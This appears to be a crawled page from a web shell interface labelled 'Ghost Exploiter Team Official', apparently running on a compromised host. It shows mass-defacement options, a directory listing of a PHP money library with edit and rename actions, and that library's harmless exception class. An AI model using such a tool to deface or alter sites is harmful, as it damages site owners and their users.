webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
moneyphp
/
money
/
src
/
Exception
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
FormatterException.php
0.253KB
edt
ren
InvalidArgumentExceptio
...
0.542KB
edt
ren
ParserException.php
0.245KB
edt
ren
UnknownCurrencyExceptio
...
0.256KB
edt
ren
UnresolvableCurrencyPai
...
0.768KB
edt
ren
<?php declare(strict_types=1); namespace Money\Exception; use InvalidArgumentException as CoreInvalidArgumentException; use Money\Exception; final class InvalidArgumentException extends CoreInvalidArgumentException implements Exception { /** @psalm-pure */ public static function divisionByZero(): self { return new self('Cannot compute division with a zero divisor'); } /** @psalm-pure */ public static function moduloByZero(): self { return new self('Cannot compute modulo with a zero divisor'); } }